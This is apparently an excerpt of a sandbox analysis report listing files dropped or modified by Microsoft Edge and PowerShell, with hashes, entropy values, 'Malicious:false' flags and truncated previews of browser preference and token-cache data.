                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a89c9818-fb85-40dc-ae95-c8d08fac9e75.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cc86b2fc-2796-4137-999d-82cc8f73abdd.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):9425
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.579639064610539
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkHy+e4WJk1cc2:u+sNwh7sWViRUdAIxBhaHyPk1UVG+
                                                                                                                                                                                                                                                                                  MD5:1BFF5EFB26CFB5BB603EFF4B1537B865
                                                                                                                                                                                                                                                                                  SHA1:53B7BCF80820A9243D4C87602D8E3BC20963D4CD
                                                                                                                                                                                                                                                                                  SHA-256:13DACE0E00870072708E35FF049CC767BD94F05CC442AC6B12DC5DEAA92189AC
                                                                                                                                                                                                                                                                                  SHA-512:0976F2B1EE3DCEDC9F310666BD81C152EC0F027195A821F7FEF413DED049BAFB0A76DC9B3ABB6798315045DD098EE4C99EE3E72AEC2AB41BDB8CCCF9FF9F79B8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\dabfd2e3-c6f1-457d-af5d-9c00425ecc85.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):8094
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.801504342613856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:asNAjszeiRUsDQ9k1R6qRAq1k8SPxVLZ7VTiq:asNAo3BEO1R6q3QxVNZTiq
                                                                                                                                                                                                                                                                                  MD5:361AF16EBFBF3F223DF2813E97D09D78
                                                                                                                                                                                                                                                                                  SHA1:46F629C0D62B55EBD9F2D3EF7013499EA1EA7F8B
                                                                                                                                                                                                                                                                                  SHA-256:549921CCFE22E12E3404683200A85876F4CC0773051F4C140F9E18CE3BCD1BC5
                                                                                                                                                                                                                                                                                  SHA-512:1D8D506E4FB006EEEBBDA87E63A31C997850C646745F8E6C77C18A800E7E9E52F8419C95BF1BD44BA4AC82367462747893F35D34910605AABEE6667CCA865FDF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\df7a2b09-9680-48ad-aefe-6316eae09a96.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22947
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.045026201773201
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:atMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhQF0ZT1ttYoA7ieJNH1NinfE:eMkbJrT8IeQc5d1nZT1tKoAOY1NiM
                                                                                                                                                                                                                                                                                  MD5:8FCAA4DAC4D45E78F8510146D5F22883
                                                                                                                                                                                                                                                                                  SHA1:7E4D3C4601836E47892668273F8E78C93BCF3EA6
                                                                                                                                                                                                                                                                                  SHA-256:C1ABC063F85B3246437AD033A3BEDF5DDD5DF7DF2B4E0A2B549A51791DBF12B2
                                                                                                                                                                                                                                                                                  SHA-512:097851ADBD3B65793899B4B5EA3C8716EFD0AFC1195567D7FEEFA5C9FAF78B67BD1B902D50EFF1B0539641C2ECE5DB6BD07CF38FE8B8451A70A6917578A9154B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f12dd6fb-cfc5-4c5c-9449-90b3d0c195d6.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8338
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.480488250017547
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2VvlIkNZjVe4WJk1cZwbzf8:u+sNwh7sWViRUdA2XjIk1OG+
                                                                                                                                                                                                                                                                                  MD5:FCC7F11B571EB602548FBA749A5692E9
                                                                                                                                                                                                                                                                                  SHA1:789692B4B561F5AD0614D63187E22C8CE26EFB1F
                                                                                                                                                                                                                                                                                  SHA-256:168CE07FAD9665827124E9364A500AF3F25E937379B04FE605A0A6E9771D83AF
                                                                                                                                                                                                                                                                                  SHA-512:E8E9E07CC3BE9ED18B81CBE5F1BB04736AC37FCC4E51E89CF4D2546EB9BE8405381B924BE64F6E08A067C7C320993EA5022BB97DDF072DF4A28D5CA45A5E2D4A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f6369db6-9d23-46dd-80b8-e404ed983285.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9453
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.592656881503978
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkE1Je4WJk1cEX:u+sNwh7sWViRUdAIxBhaE1Mk1ZVG+
                                                                                                                                                                                                                                                                                  MD5:9689BB39B34C4262FFE6A272E8C580B6
                                                                                                                                                                                                                                                                                  SHA1:1E2144980A33D7308667B1C8E14B3F58FC6DF839
                                                                                                                                                                                                                                                                                  SHA-256:91CFCB242BB4379FD61F6174BDE0B58AC95E1CA8A93E01D5D836412D929C774C
                                                                                                                                                                                                                                                                                  SHA-512:7641FE6720F45B110516630BC524C8B53557A7304EBA1FACFFCE0C25BE8352DAE61169A967B39C11513D195B2675BED30C3F8D05A463DB8890BDEECC4D48A359
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fd0c2dda-05ee-4ddb-9fc7-e23549543ca3.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):9437
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.589197043255668
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkNUje4WJk1chJ:u+sNwh7sWViRUdAIxBhaNUOk1iVG+
                                                                                                                                                                                                                                                                                  MD5:951210B24955FAF6711225B56ED89D1D
                                                                                                                                                                                                                                                                                  SHA1:A06D26AE9B4A6BD71B9DC32AD5D7EE870403AF32
                                                                                                                                                                                                                                                                                  SHA-256:90E81CEA78D8C1721F9196F37B1757C384EB042255A19317D55DFCAB1854955C
                                                                                                                                                                                                                                                                                  SHA-512:2E9BC13064648AA78FB2D23999E3C6A0E7331597E545D3C1176684BDDFBEACBD6D259A6F6BB6472E318E728B5719A6E2DC43282C41F3CB126A6385B806806451
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8491657806226436
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxLixl9Il8uOVGtJ8Pl7bCtjpdG2UhLtd1rc:mfYkEtJ8PsQ2b
                                                                                                                                                                                                                                                                                  MD5:27150F78AE262BEC8428F379ACB6240B
                                                                                                                                                                                                                                                                                  SHA1:017B202484C4A57C0D79EFFB7CEDA409D5E7E829
                                                                                                                                                                                                                                                                                  SHA-256:B95C2466C35D175F85345069A3E4BC206E720F5B664E130CF4C3194950C6D4F7
                                                                                                                                                                                                                                                                                  SHA-512:A1C5A7C68AFD20124F8E3474DCF9F12609448632D3C227A70697AF9878761DE120C76B98AA95C12DDFEA10A111A45C584B1CC243E75208B5D0D391740D934D85
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.E.P.9.I.j.N.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.i.s.C.c.U.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9970227376418976
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:hYk3tGzs11tkI0XArZkjblMb2Dgv2YNI6PxzZOB:hz3Iw50XArwYhvLy
                                                                                                                                                                                                                                                                                  MD5:F2CE353B4DD0FE6B3DB543B2B980609B
                                                                                                                                                                                                                                                                                  SHA1:9826BEF89719BEECBEF95084BACA358553AEDC9C
                                                                                                                                                                                                                                                                                  SHA-256:70AF78608EB8DF3037B8A0CAB4C18F32E9811398DAC25789C1638315A7547227
                                                                                                                                                                                                                                                                                  SHA-512:D0D641F234D5FF187C085E221BD47B18A63D322ABAF52C778375AF69A9B2D6B476AE595A68B2925BDF76FA8D57B42DBC948AECBB70E7B24AD2DDEF00A9334C06
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:."./.U.B.3.C.C.t.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.i.s.C.c.U.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9080647984944825
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xCHxl9Il8uOVHga0lNVXuc8DUWhiXxZVdD2CkgE/xY/YBd/vc:aSYkJ01X98IWMtkg6xY9
                                                                                                                                                                                                                                                                                  MD5:AA70D33B88426A901E97DCA61C49F735
                                                                                                                                                                                                                                                                                  SHA1:17B6B05E5175A8B0794660C1B6F4F9E01550471D
                                                                                                                                                                                                                                                                                  SHA-256:398CC667FBD150E15D08BE3B9DD1EE4CF63A37D31520829685407734E63A4915
                                                                                                                                                                                                                                                                                  SHA-512:2B59669B40ECEA673D537D2F5EAFF9B3ACDC5B1A02B70F1FD4E6DA9338D9C45718D276B7EED967DA308D673C2356C51D7AD5339B1A5A7152D201EE69A6FFA455
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.t.s.5.O.f.x.p.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.i.s.C.c.U.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61147
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077943793919534
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                                                                                                                                                                                  MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                                                                                                                                                                                  SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
